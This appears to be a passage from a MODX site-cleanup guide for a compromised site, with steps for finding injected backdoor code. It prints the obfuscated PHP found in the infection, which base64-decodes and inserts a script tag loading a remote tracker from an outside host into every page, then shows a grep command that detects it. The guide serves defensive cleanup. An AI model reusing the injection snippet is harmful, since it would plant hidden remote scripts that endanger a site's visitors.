Check for users you didn't create. Manually empty the core/cache/ directory. Look for files with unusual creation or modification dates, and check them for strange, uncommented and out-of-place base64_decode() functions, like the one described above, or if you have a command line or tool for searching multiple files, search for at least part of that encoded string.
if ($_SERVER["HTTP_REFERER"]!='') {
$linker = base64_decode("PG5vaW5kZXg+CjxzY3JpcHQgc3JjPSIvL3N0YXQucm9sbGVkd2lsLmJpei9zdGF0LnBocD88cmVwbGFjZT4iPjwvc2NyaXB0Pgo8L25vaW5kZXg+");
$param = str_replace('.','',$_SERVER['SERVER_ADDR']);
$linker = str_replace('<replace>', $param, $linker );
$this->modx->resource->_output = str_replace("</body>", $linker."\n</body>", $this->modx->resource->_output); }
If you take that coded string and run it through an online decoder, like
http://www.base64decode.org/, it does decode into that javascript link:
<noindex>
<script src="//stat.rolledwil.biz/stat.php?<replace>"></script>
</noindex>
Example command for searching for this via the command line:
grep -H -r "base64_decode("PG5vaW5kZXg" /home/myuser/public_html